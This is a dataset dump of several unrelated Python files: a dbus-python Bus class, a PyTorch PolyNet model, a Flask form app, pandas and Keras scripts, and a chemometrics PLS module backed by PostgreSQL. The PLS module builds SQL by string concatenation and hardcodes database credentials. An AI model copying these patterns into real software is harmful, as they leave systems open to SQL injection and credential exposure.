Bus(BusConnection):\n \"\"\"A connection to one of three possible standard buses, the SESSION,\n SYSTEM, or STARTER bus. This class manages shared connections to those\n buses.\n\n If you're trying to subclass `Bus`, you may be better off subclassing\n `BusConnection`, which doesn't have all this magic.\n \"\"\"\n\n _shared_instances = {}\n\n def __new__(cls, bus_type=BusConnection.TYPE_SESSION, private=False,\n mainloop=None):\n \"\"\"Constructor, returning an existing instance where appropriate.\n\n The returned instance is actually always an instance of `SessionBus`,\n `SystemBus` or `StarterBus`.\n\n :Parameters:\n `bus_type` : cls.TYPE_SESSION, cls.TYPE_SYSTEM or cls.TYPE_STARTER\n Connect to the appropriate bus\n `private` : bool\n If true, never return an existing shared instance, but instead\n return a private connection.\n\n :Deprecated: since 0.82.3. Use dbus.bus.BusConnection for\n private connections.\n\n `mainloop` : dbus.mainloop.NativeMainLoop\n The main loop to use. The default is to use the default\n main loop if one has been set up, or raise an exception\n if none has been.\n :Changed: in dbus-python 0.80:\n converted from a wrapper around a Connection to a Connection\n subclass.\n \"\"\"\n if (not private and bus_type in cls._shared_instances):\n return cls._shared_instances[bus_type]\n\n # this is a bit odd, but we create instances of the subtypes\n # so we can return the shared instances if someone tries to\n # construct one of them (otherwise we'd eg try and return an\n # instance of Bus from __new__ in SessionBus). why are there\n # three ways to construct this class? we just don't know.\n if bus_type == BUS_SESSION:\n subclass = SessionBus\n elif bus_type == BUS_SYSTEM:\n subclass = SystemBus\n elif bus_type == BUS_STARTER:\n subclass = StarterBus\n else:\n raise ValueError('invalid bus_type %s' % bus_type)\n\n bus = BusConnection.__new__(subclass, bus_type, mainloop=mainloop)\n\n bus._bus_type = bus_type\n\n if not private:\n cls._shared_instances[bus_type] = bus\n\n return bus\n\n def close(self):\n t = self._bus_type\n if self.__class__._shared_instances.get(t) is self:\n del self.__class__._shared_instances[t]\n super(Bus, self).close()\n\n def get_connection(self):\n \"\"\"Return self, for backwards compatibility with earlier dbus-python\n versions where Bus was not a subclass of Connection.\n\n :Deprecated: since 0.80.0\n \"\"\"\n return self\n _connection = property(get_connection, None, None,\n \"\"\"self._connection == self, for backwards\n compatibility with earlier dbus-python versions\n where Bus was not a subclass of Connection.\"\"\")\n\n def get_session(private=False):\n \"\"\"Static method that returns a connection to the session bus.\n\n :Parameters:\n `private` : bool\n If true, do not return a shared connection.\n \"\"\"\n return SessionBus(private=private)\n\n get_session = staticmethod(get_session)\n\n def get_system(private=False):\n \"\"\"Static method that returns a connection to the system bus.\n\n :Parameters:\n `private` : bool\n If true, do not return a shared connection.\n \"\"\"\n return SystemBus(private=private)\n\n get_system = staticmethod(get_system)\n\n\n def get_starter(private=False):\n \"\"\"Static method that returns a connection to the starter bus.\n\n :Parameters:\n `private` : bool\n If true, do not return a shared connection.\n \"\"\"\n return StarterBus(private=private)\n\n get_starter = staticmethod(get_starter)\n\n def __repr__(self):\n if self._bus_type == BUS_SESSION:\n name = 'session'\n elif self._bus_type == BUS_SYSTEM:\n name = 'system'\n elif self._bus_type == BUS_STARTER:\n name = 'starter'\n else:\n name = 'unknown bus type'\n\n return '<%s.%s (%s) at %#x>' % (self.__class__.__module__,\n self.__class__.__name__,\n name, id(self))\n __str__ = __repr__\n\n\n# FIXME: Drop the subclasses here? I can't think why we'd ever want\n# polymorphism\nclass SystemBus(Bus):\n \"\"\"The system-wide message bus.\"\"\"\n def __new__(cls, private=False, mainloop=None):\n \"\"\"Return a connection to the system bus.\n\n :Parameters:\n `private` : bool\n If true, never return an existing shared instance, but instead\n return a private connection.\n `mainloop` : dbus.mainloop.NativeMainLoop\n The main loop to use. The default is to use the default\n main loop if one has been set up, or raise an exception\n if none has been.\n \"\"\"\n return Bus.__new__(cls, Bus.TYPE_SYSTEM, mainloop=mainloop,\n private=private)\n\nclass SessionBus(Bus):\n \"\"\"The session (current login) message bus.\"\"\"\n def __new__(cls, private=False, mainloop=None):\n \"\"\"Return a connection to the session bus.\n\n :Parameters:\n `private` : bool\n If true, never return an existing shared instance, but instead\n return a private connection.\n `mainloop` : dbus.mainloop.NativeMainLoop\n The main loop to use. The default is to use the default\n main loop if one has been set up, or raise an exception\n if none has been.\n \"\"\"\n return Bus.__new__(cls, Bus.TYPE_SESSION, private=private,\n mainloop=mainloop)\n\nclass StarterBus(Bus):\n \"\"\"The bus that activated this process (only valid if\n this process was launched by DBus activation).\n \"\"\"\n def __new__(cls, private=False, mainloop=None):\n \"\"\"Return a connection to the bus that activated this process.\n\n :Parameters:\n `private` : bool\n If true, never return an existing shared instance, but instead\n return a private connection.\n `mainloop` : dbus.mainloop.NativeMainLoop\n The main loop to use. The default is to use the default\n main loop if one has been set up, or raise an exception\n if none has been.\n \"\"\"\n return Bus.__new__(cls, Bus.TYPE_STARTER, private=private,\n mainloop=mainloop)\n","sub_path":"dbus/_dbus.py","file_name":"_dbus.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113243767","text":"import pretrainedmodels\nimport torch\nimport torchvision\nfrom torch import nn\nfrom torch.nn import functional as F\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\n\nclass PolyNet(nn.Module):\n\n def __init__(self, parameters):\n\n super().__init__()\n self.pretrained = parameters['pretrained']\n self.model_name = parameters['model_name']\n self.num_classes = parameters['num_classes']\n self.num_channels = parameters['num_channels']\n self.pooling_output_dim = parameters['pooling_output_dim']\n self.output_features = parameters['pooling_output_dim'] ** 2\n self.debug = False\n self.dropout = True\n self.dropout_p = 0.2\n\n if self.pretrained:\n self.polynet = pretrainedmodels.__dict__['polynet'](\n num_classes=1000, pretrained='imagenet')\n else:\n self.polynet = pretrainedmodels.__dict__['polynet'](\n num_classes=1000, pretrained=None)\n\n self.polynet.avg_pool = nn.AdaptiveMaxPool2d((\n self.pooling_output_dim, self.pooling_output_dim))\n self.polynet.last_linear = nn.Linear(\n in_features=self.output_features * 2048,\n out_features=self.num_classes,\n bias=True)\n\n def forward(self, x):\n\n x[:, 0, :, :] = (x[:, 0, :, :] - mean[0]) / std[0]\n x[:, 1, :, :] = (x[:, 1, :, :] - mean[1]) / std[1]\n x[:, 2, :, :] = (x[:, 2, :, :] - mean[2]) / std[2]\n\n if self.debug:\n print('input: {}'.format(x.size()))\n\n out = self.polynet(x)\n\n if self.debug:\n print('out', out.size())\n\n return out\n","sub_path":"pytorch/models_pretrained/polynet.py","file_name":"polynet.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"551373106","text":"from flask import Flask, render_template_string, request\n# ssh @ssh.pythonanywhere.com\napp = Flask(__name__)\nhtml = \"\"\"\n
    \n
    \n \n
    \n \n
    \n
    \n\"\"\"\n@app.route(\"/\")\ndef index():\n return render_template_string(html)\n\n@app.route(\"/sent\", methods=[\"GET\",\"POST\"])\ndef sent():\n line = None\n if request.method == \"POST\":\n line = request.form[\"line\"]\n with open(\"user_input_flask.txt\", \"a+\") as target:\n target.write(line+\"\\n\")\n return render_template_string(html)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"99.py","file_name":"99.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146606","text":"#pandas \n\nimport pandas as pd\n\n\n#읽기(새로운 파일로) \ndf2 = pd.read_csv('/Users/hyeonseongjun/Desktop/inflearn/section2/test/bnmva23-1/csv_s2.csv',sep=';', skiprows=[0],header=None,names=['Name','Test1','Test2','Test3','Final','Grade'])#sep는 구분자이다 \n# print(df)\n\n#컬럼 내용 추가 \n# df2['Grade'] = df2['Grade'].str.replace('C','A++')\n# print(df2)\n\n#평균 컬럼 추가 \ndf2['Avg'] = df2[['Test1','Test2','Test3','Final']].mean(axis=1)#여러개는 [[]]로 넣어준다 1은 row행을 나타낸다 mean은 최소값이지만 평균을 나타냄 \n# print(df2)\n\n#합계 컬럼 추가 \ndf2['Sum'] = df2[['Test1','Test2','Test3','Final']].sum(axis=1)\nprint(df2)\n\ndf2.to_csv('/Users/hyeonseongjun/Desktop/inflearn/section2/test/bnmva23-1/result_s1.csv',index=False)","sub_path":"download4-5-2.py","file_name":"download4-5-2.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"463557804","text":"from keras.layers import Dense, Embedding, Input, SpatialDropout1D, Flatten, Dropout, ActivityRegularization, concatenate\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers.pooling import MaxPooling1D\nfrom keras.models import Model\nfrom tensorflow.contrib.keras import regularizers\n\nfrom keras.layers import Dense, Bidirectional, Input, Flatten, Embedding, TimeDistributed, multiply\n\nfrom keras import backend as K\nfrom keras.layers.core import SpatialDropout1D, Dropout, Reshape, Lambda, Permute, RepeatVector\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\n\nfrom keras import backend as K\nfrom keras.layers import LSTM, Dense, Input, Embedding, Bidirectional, GRU\nfrom keras.layers.core import SpatialDropout1D, Reshape, Lambda, Permute, RepeatVector\nfrom keras.models import Model\nfrom tensorflow.contrib.keras.python.keras.layers import merge\n\n\nfrom attention_layrer import Attention, AttentionWithContext\n\ndef get_config():\n return {\n 'embedding_size': 30,\n 'dropout_embedding': 0.6,\n\n 'cnn_dilation_rates': '1',\n 'cnn_windows': '12',\n 'cnn_num_filters': 200,\n 'cnn_filter_strides': '1',\n 'cnn_pool_sizes': ['all,all,all'],\n\n 'lstm_layer_size': 32,\n 'recurrent_dropout': 0.2,\n\n 'l2_reg_lambda': 0.001,\n\n 'attention': True,\n\n 'dense_layer_size': None,\n 'dropout_prob': 0.2\n }\n\n\ndef create_model(embeddings, config=get_config(), sentence_length=100):\n\n config['sentence_length']=sentence_length\n\n # sentence attention\n attention_input = Input(shape=(config['sentence_length'] - 2, config['embedding_size'],), dtype='float32')\n\n x = Permute((2, 1))(attention_input)\n x = Reshape((config['embedding_size'], config['sentence_length'] - 2))(x)\n x = Dense(config['sentence_length'] - 2, activation='softmax', bias=True)(x)\n\n x = Lambda(lambda x: K.mean(x, axis=1), name='attention_vector_sentence')(x)\n x = RepeatVector(config['embedding_size'])(x)\n # x = Lambda(lambda x: x, name='attention_vector_sentence')(x)\n\n attention_probabilities = Permute((2, 1))(x)\n\n x = multiply([attention_input, attention_probabilities], name='attention_mul')\n x = Lambda(lambda x: K.sum(x, axis=1))(x)\n\n sentence_attention = Model(attention_input, x, name='sentence_attention')\n\n embedding_layer = Embedding(\n embeddings.shape[0],\n embeddings.shape[1],\n input_length=config['sentence_length'],\n trainable=False,\n weights=[embeddings],\n )\n\n input = Input(shape=(config['sentence_length'],), dtype='int32')\n x = embedding_layer(input)\n x = SpatialDropout1D(config['dropout_embedding'])(x)\n\n x = Conv1D(\n config['cnn_num_filters'],\n 3,\n # activation='relu',\n use_bias=True,\n # kernel_regularizer=regularizers.l2(config['l2_reg_lambda']),\n # strides=1\n )(x)\n\n\n # x = MaxPooling1D(1, padding='valid')(x)\n # x = Flatten()(x)\n #x = Attention()(x)\n\n #x = Bidirectional(GRU(config['lstm_layer_size'], return_sequences=config['attention'], recurrent_dropout=config['recurrent_dropout'], dropout=config['dropout_prob']))(x)\n # x = GRU(config['lstm_layer_size'], return_sequences=config['attention'], recurrent_dropout=config['recurrent_dropout'], dropout=config['dropout_prob'])(x)\n\n if config['attention']:\n #x = sentence_attention(x)\n x = Attention()(x)\n\n # x = ActivityRegularization(l2=config['l2_reg_lambda'])(x)\n\n #\n # conv_results[-1] = ActivityRegularization(l2=config['l2_reg_lambda'])(conv_results[-1])\n\n if config['dense_layer_size']:\n x = Dense(config['dense_layer_size'], activation='relu',\n kernel_regularizer=regularizers.l2(config['l2_reg_lambda']))(x)\n x = Dropout(config['dropout_prob'])(x)\n\n output = Dense(1, activation='sigmoid')(x)\n\n model = Model(inputs=input, outputs=output)\n\n return model, config\n\n\n","sub_path":"model_cnn_rnn.py","file_name":"model_cnn_rnn.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"46922315","text":"#!/usr/bin/env python\nfrom __future__ import unicode_literals, print_function\nimport re\n\n\nshow_version = '''\nCisco 881 (MPC8300) processor (revision 1.0) with 236544K/25600K bytes of memory.\nProcessor board ID FTX0000038X\n5 FastEthernet interfaces\n1 Virtual Private Network (VPN) Module\n256K bytes of non-volatile configuration memory.\n126000K bytes of ATA CompactFlash (Read/Write)\n'''\n\nkhade = re.search(r\"^Cisco (?P\\S+) .* with (?P\\S+) \" , show_version, flags=re.M)\nmodel = khade.groupdict()['model']\nmemory = khade.groupdict()['memory']\n\nprint(model)\nprint(memory)","sub_path":"automationrepo/regexp.py","file_name":"regexp.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"627974330","text":"import sys\nimport numpy as np \n# import matplotlib.pyplot as plt\nimport json\nfrom math import sqrt\nfrom flask import jsonify\nfrom datetime import datetime\nfrom scipy import stats\nfrom pyod.models.knn import KNN\n# from sksos import SOS\nfrom metodos.pca import PCA\n\nsys.path.append(\"..\\dao\")\n\nfrom sklearn.cross_decomposition import PLSRegression\nfrom sklearn.metrics import r2_score, mean_squared_error, median_absolute_error, mean_absolute_error, \\\n mean_squared_log_error, coverage_error, label_ranking_loss, explained_variance_score, \\\n label_ranking_average_precision_score\nfrom sqlalchemy.orm import relationship, backref, sessionmaker, joinedload\nfrom sklearn import metrics\n\nfrom sqlalchemy import create_engine\n\ndb_string = \"postgresql://postgres:postgres@localhost:5432/Quimiometria\"\n# db_string = \"postgresql://postgres:postgres@localhost:5432/bkpSteven\"\n\ndb = create_engine(db_string)\n\nSession = sessionmaker(bind=db)\nsession = Session()\n\n\nclass PLS(object):\n\n def predicao(self, idmodelo, idamostra):\n\n idmodelo = idmodelo\n\n idamostra = idamostra\n\n print(idmodelo)\n print(idamostra)\n\n X = self.selectMatrizX(idmodelo, \"VALIDACAO\")\n Y = self.selectMatrizY(idmodelo, \"VALOR\", \"VALIDACAO\")\n\n amostraPredicao = self.selectAmostra(idamostra, idmodelo)\n\n valorReferencia = self.selectDadosReferenciaAmostra(idamostra, idmodelo)\n\n pls = PLSRegression(copy=True, max_iter=500, n_components=20, scale=False, tol=1e-06)\n\n pls.fit(X, Y)\n print(amostraPredicao)\n valorPredito = pls.predict(amostraPredicao)\n\n print('Amostra: ' + str(idamostra) + ' - Valor Predito :' + str(valorPredito) + ' - Valor Referencia :' + str(\n valorReferencia))\n\n cursorDadosCalibracao = db.execute(\"select rmsec, rmsep, coeficientecal, coeficienteval, dtcalibracao \"\n \"from calibracao where inativo = 'A' and idmodelo = \" + str(idmodelo) + \" \")\n for regCodigo in cursorDadosCalibracao:\n rmsec = regCodigo[0]\n rmsep = regCodigo[1]\n coeficienteCal = regCodigo[2]\n coeficienteVal = regCodigo[3]\n dtcalibracao = regCodigo[4]\n\n print(rmsec)\n print(rmsep)\n print(coeficienteCal)\n print(coeficienteVal)\n print(dtcalibracao)\n\n dtcalibracao = dtcalibracao.strftime('%d/%m/%Y')\n print(dtcalibracao)\n\n # tratamento dos dados para o Json\n coeficienteCal = round(coeficienteCal, 2)\n coeficienteVal = round(coeficienteVal, 2)\n rmsec = round(rmsec, 2)\n rmsep = round(rmsep, 2)\n valorReferencia = round(valorReferencia, 2)\n\n valorPreditoString = str(valorPredito)\n valorPreditoString = valorPreditoString.replace(\"[\", \"\")\n valorPreditoString = valorPreditoString.replace(\"]\", \"\")\n\n ##Contrucao do JSON\n json_data = jsonify(idamostra=str(idamostra), valorpredito=str(valorPreditoString),\n rmsec=str(rmsec), rmsep=str(rmsep), idmodelo=str(idmodelo), dtcalibracao=str(dtcalibracao),\n valorreferencia=str(valorReferencia), coeficientecal=str(coeficienteCal), coeficienteval=str(coeficienteVal))\n\n return json_data\n\n def selectAmostra(self, idAmostra, idmodelo):\n\n try:\n # numero de colunas da matriz\n cursorColunas = db.execute(\"select max(x.nrposicaocoluna) from matrizx x where x.idamostra = \" + str(\n idAmostra) + \" and x.idmodelo = \" + str(idmodelo) + \"\")\n\n contadorColunas = 0\n\n for linha in cursorColunas:\n contadorColunas = linha[0]\n\n # Preenchimento da MatrizX\n matrizX = []\n\n cursorAmostras = db.execute(\"select x.idamostra from matrizx x \"\n \"where x.idamostra = \" + str(idAmostra) + \"\"\n \" and x.idmodelo = \" + str(idmodelo) + \"\"\n \" group by x.idamostra order by x.idamostra asc\")\n\n listaAmostras = []\n for regAmostras in cursorAmostras:\n listaAmostras.append(regAmostras[0])\n\n # print(listaAmostras)\n\n for amostra in listaAmostras:\n # print(amostra)\n linhaMatriz = []\n\n cursorDadosAmostra = db.execute(\"SELECT x.idamostra, x.vllinhacoluna FROM matrizx x \"\n \"where x.idamostra = \" + str(amostra) + \"\"\n \" and x.idmodelo = \" + str(\n idmodelo) + \"\"\n \" order by x.idamostra, x.nrsequencia, x.nrposicaolinha, x.nrposicaocoluna asc\")\n\n for regDadosAmostra in cursorDadosAmostra:\n if regDadosAmostra[1] == 0E-8:\n linhaMatriz.append('0')\n else:\n linhaMatriz.append(regDadosAmostra[1])\n # x=Symbol('x')\n # difx = diff(regDadosAmostra[1], x)\n # linhaMatriz.append(difx)\n\n # print(amostra)\n # print(linhaMatriz)\n matrizX += [linhaMatriz]\n\n # print('AMOSTRA SELECIONADA')\n # print(matrizX)\n\n return matrizX\n except Exception:\n # print(Exception)\n return \"Ocorreu um erro na busca dos dados\"\n\n def selectMatrizX(self, idModelo, conjunto):\n\n try:\n # numero de colunas da matriz\n\n if conjunto == \"TODOS\":\n sqlConsulta = (\" inner join matrizy y on (x.idamostra = y.idamostra and y.idmodelo = x.idmodelo) \"\n \" inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \")\n whereConsulta = (\"where x.idModelo = \" + str(idModelo) + \" and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"CALIBRAR\":\n sqlConsulta = (\" inner join matrizy y on (x.idamostra = y.idamostra and y.idmodelo = x.idmodelo) \"\n \"inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \"\n \"inner join amostra_calibracao ac on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \"inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\"where x.idModelo = \" + str(\n idModelo) + \" and ac.tpconjunto = 'NORMAL' and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"CALIBRACAO\":\n sqlConsulta = (\" inner join matrizy y on (x.idamostra = y.idamostra and y.idmodelo = x.idmodelo) \"\n \"inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \"\n \"inner join amostra_calibracao ac on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \"inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\"where x.idModelo = \" + str(\n idModelo) + \" and ac.tpconjunto = 'CALIBRACAO' and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"VALIDACAO\":\n sqlConsulta = (\" inner join matrizy y on (x.idamostra = y.idamostra and y.idmodelo = x.idmodelo) \"\n \"inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \"\n \"inner join amostra_calibracao ac on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \"inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\n \"where x.idModelo = \" + str(idModelo) + \" and ac.tpconjunto = 'VALIDACAO' and a.tpamostra <> 'OUTLIER' \")\n\n sqlColunas = (\n \" select max(x.nrposicaocoluna) from matrizx x \" + str(sqlConsulta) + \" \" + str(whereConsulta) + \" \")\n cursorColunas = db.execute(sqlColunas)\n\n contadorColunas = 0\n\n for linha in cursorColunas:\n contadorColunas = linha[0]\n # print(contadorColunas)\n\n # Preenchimento da MatrizX\n matrizX = []\n\n sqlListaAmostras = (\"select x.idamostra from matrizx x \" + str(sqlConsulta) + str(\n whereConsulta) + \"group by x.idamostra order by x.idamostra asc\")\n cursorAmostras = db.execute(sqlListaAmostras)\n\n \"\"\"cursorAmostras = db.execute(\"select x.idamostra from matrizx x \"\n \"inner join matrizy y on (y.idamostra = x.idamostra and y.idmodelo = x.idmodelo) \"\n \"inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \"\n \"where x.idModelo = \" + str(idModelo) + \" \" \n \"group by x.idamostra order by x.idamostra asc\")\"\"\"\n\n cont = 0\n listaAmostras = []\n for regAmostras in cursorAmostras:\n listaAmostras.append(regAmostras[0])\n cont = cont + 1\n\n # print('...............................')\n # print('Qtde de Amostras - Matriz X')\n # print(conjunto)\n # print(cont)\n # print('...............................')\n\n for amostra in listaAmostras:\n # print(amostra)\n linhaMatriz = []\n\n cursorDadosAmostra = db.execute(\"SELECT idamostra, vllinhacoluna \tFROM matrizx x \"\n \"where x.idamostra = \" + str(amostra) + \" and x.idModelo = \" + str(\n idModelo) + \"\"\n \"order by x.idamostra, x.nrsequencia, x.nrposicaolinha, x.nrposicaocoluna asc\")\n\n for regDadosAmostra in cursorDadosAmostra:\n if regDadosAmostra[1] == 0E-8:\n linhaMatriz.append('0')\n else:\n linhaMatriz.append(regDadosAmostra[1])\n # x=Symbol('x')\n # difx = diff(regDadosAmostra[1], x)\n # linhaMatriz.append(difx)\n\n # print(amostra)\n # print(linhaMatriz)\n matrizX += [linhaMatriz]\n\n # print('MATRIZ - X')\n # print(matrizX)\n\n return matrizX\n except Exception:\n print(Exception)\n return \"Ocorreu um erro na busca dos dados\"\n\n def selectMatrizY(self, idmodelo, tipo, conjunto):\n\n try:\n if conjunto == \"TODOS\":\n sqlConsulta = (\" select y.idamostra from matrizy y \"\n \"inner join amostra a on (a.idamostra = y.idamostra and a.idmodelo = y.idmodelo) \")\n whereConsulta = (\" where y.idmodelo = \" + str(idmodelo) + \" and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"CALIBRACAO\":\n sqlConsulta = (\" select ac.idamostra from amostra_calibracao ac \"\n \" inner join amostra a on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \" inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\" where ac.idModelo = \" + str(\n idmodelo) + \" and ac.tpconjunto = 'CALIBRACAO' and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"VALIDACAO\":\n sqlConsulta = (\" select ac.idamostra from amostra_calibracao ac \"\n \" inner join amostra a on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \" inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\" where ac.idModelo = \" + str(\n idmodelo) + \" and ac.tpconjunto = 'VALIDACAO' and a.tpamostra <> 'OUTLIER' \")\n\n matrizY = []\n\n sqlListaAmostras = (\" \" + str(sqlConsulta) + \" \" + str(whereConsulta) + \" order by 1 asc\")\n cursorAmostras = db.execute(sqlListaAmostras)\n\n \"\"\"cursorAmostras = db.execute(\"select y.idamostra from matrizy y \"\n \"inner join amostra a on (a.idamostra = y.idamostra and a.idmodelo = y.idmodelo) \"\n \" where y.idmodelo = \" + str(idmodelo) + \" \" \n \"order by y.idamostra asc\")\"\"\"\n\n listaAmostras = []\n cont = 0\n for regAmostras in cursorAmostras:\n listaAmostras.append(regAmostras[0])\n cont = cont + 1\n\n # print(listaAmostras)\n # print('............................................')\n # print('Qtde de Amostras - Matriz Y')\n # print(conjunto)\n # print(cont)\n # print('............................................')\n\n for amostra in listaAmostras:\n # print(amostra)\n linhaMatriz = []\n\n cursorDadosAmostra = db.execute(\"select y.idamostra, case y.vlreferencia when 0 then '0.1' else y.vlreferencia end as vlreferencia \"\n \"from matrizy y where y.idamostra = \" + str(amostra) + \" \"\n \"and y.idmodelo = \" + str(idmodelo) + \" order by y.idamostra asc\")\n\n for regDadosAmostra in cursorDadosAmostra:\n if regDadosAmostra[1] == 0E-8:\n linhaMatriz.append('0')\n else:\n if tipo == \"ID\":\n linhaMatriz.append(regDadosAmostra[0])\n if tipo == \"VALOR\":\n linhaMatriz.append(np.double(regDadosAmostra[1]))\n\n # print(amostra)\n # print(linhaMatriz)\n matrizY += [linhaMatriz]\n\n # print('MATRIZ - Y')\n # print(matrizY)\n\n return matrizY\n except Exception:\n print(Exception)\n return \"Ocorreu um erro na busca dos dados\"\n\n def selectDadosReferenciaAmostra(self, idAmostra, idmodelo):\n\n try:\n cursorDadosAmostra = db.execute(\n \"SELECT y.vlreferencia FROM matrizy y where y.idamostra = \" + str(idAmostra) + \" and y.idmodelo = \" + str(\n idmodelo) + \"\")\n\n for regDadosAmostra in cursorDadosAmostra:\n valorReferencia = regDadosAmostra[0]\n\n return valorReferencia\n except Exception:\n return \"Ocorreu um erro na busca dos dados\"\n\n def detectarOutlierKNN(self, idmodelo, Xtodos, corteOutlier):\n # Detecao Outliers 1--------------------------------------------------------------\n clf = KNN()\n clf.fit(Xtodos)\n\n # get outlier scores\n y_train_scores = clf.decision_scores_ # raw outlier scores\n y_test_scores = clf.decision_function(Xtodos) # outlier scores\n\n YCodigoTodosComOutilier = self.selectMatrizY(idmodelo, \"ID\", \"TODOS\")\n\n cont = 0\n amostrasRemovidas = 0\n\n for itemOutilier in y_train_scores:\n if itemOutilier > corteOutlier:\n contTodos = 0\n for item in YCodigoTodosComOutilier:\n amostra = str(item)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n if contTodos == cont:\n db.execute(\n \" update amostra set tpamostra = 'OUTLIER' where idamostra = \" + str(amostra) + \" and idmodelo = \" + str(\n idmodelo) + \"\")\n print(itemOutilier)\n amostrasRemovidas = amostrasRemovidas + 1\n break\n contTodos = contTodos + 1\n cont = cont + 1\n\n session.commit()\n print(\"Numero de Amostras Removidas: \" + str(amostrasRemovidas))\n return cont\n\n def outliersZScore(self, idmodelo, Xtodos, corteOutlier):\n y_train_scores = np.abs(stats.zscore(Xtodos))\n\n YCodigoTodosComOutilier = self.selectMatrizY(idmodelo, \"ID\", \"TODOS\")\n\n cont = 0\n amostrasRemovidas = 0\n\n for itemOutilier in y_train_scores:\n print(itemOutilier)\n if itemOutilier > corteOutlier:\n contTodos = 0\n for item in YCodigoTodosComOutilier:\n amostra = str(item)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n if contTodos == cont:\n db.execute(\n \" update amostra set tpamostra = 'OUTLIER' where idamostra = \" + str(amostra) + \" and idmodelo = \" + str(\n idmodelo) + \"\")\n print(itemOutilier)\n amostrasRemovidas = amostrasRemovidas + 1\n break\n contTodos = contTodos + 1\n cont = cont + 1\n\n session.commit()\n print(\"Numero de Amostras Removidas: \" + str(amostrasRemovidas))\n return cont\n\n def calibracao(self, idmodelo, nrcomponentes, corteOutlier, qtdeRemocoes, executaPCA, qtdePC):\n\n # Inativa calibracoes anteriores\n db.execute(\" update calibracao set inativo = 'F'\" +\n \" where idmodelo = \" + str(idmodelo) + \" \")\n db.execute(\" update amostra set tpamostra = 'NORMAL' where idmodelo = \" + str(idmodelo) + \"\")\n session.commit()\n\n # cria calibracao para o modelo\n data_Atual = datetime.today()\n data_em_texto = data_Atual.strftime('%d/%m/%Y')\n\n cursorCodigo = db.execute(\n \"select coalesce(max(idcalibracao),0) + 1 as codigo from calibracao where idmodelo = \" + str(idmodelo) + \" \")\n for regCodigo in cursorCodigo:\n idcalibracao = regCodigo[0]\n\n db.execute(\"insert into calibracao (idcalibracao, idmodelo, dtcalibracao, inativo) \"\n \"values (\" + str(idcalibracao) + \",\" + str(idmodelo) + \" , '\" + str(data_em_texto) + \"', 'A' )\")\n session.commit()\n\n idmodelo = idmodelo\n\n print(idmodelo)\n\n Xtodos = self.selectMatrizX(idmodelo, \"TODOS\")\n\n # caso seja necessario PCA\n pca = PCA()\n if executaPCA == 'S':\n Xtodos = pca.testePCA(Xtodos,qtdePC)\n\n\n # ***************************************************************************************************************\n # inicio kennard-stone\n # data = pd.DataFrame(Xtodos)\n\n #Xtodos = self.selectMatrizX(idmodelo, \"TODOS\")\n number_of_samples = Xtodos.__len__()\n number_of_samples = number_of_samples * 0.65\n\n # selected_sample_numbers, remaining_sample_numbers = kennardstonealgorithm(X, number_of_samples)\n amostras_Calibracao = kennardStone(Xtodos, number_of_samples)\n\n # amostras_Calibracao = kennardStone(autoscaled_X, number_of_samples)\n # print(\"amostras_Calibracao\")\n # print(amostras_Calibracao)\n # print(\"---\")\n # print(\"remaining sample numbers\")\n # print(remaining_sample_numbers)\n\n # Insercao das amostras de Validacao\n YCodigoTodos = self.selectMatrizY(idmodelo, \"ID\", \"TODOS\")\n\n for amostraX in YCodigoTodos:\n\n amostra = str(amostraX)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n\n # print(amostra)\n db.execute(\"insert into amostra_calibracao (idcalibracao, idmodelo, idamostra, tpconjunto) \"\n \"values (\" + str(idcalibracao) + \",\" + str(idmodelo) + \" , '\" + str(\n int(float(amostra))) + \"','VALIDACAO' )\")\n\n session.commit()\n\n # Insercao das amostras de Calibracao\n cont = 0\n for amostraCalibracao in amostras_Calibracao:\n amostra = str(amostraCalibracao)\n amostra = amostra.replace(\"[\", \"\")\n amostra = 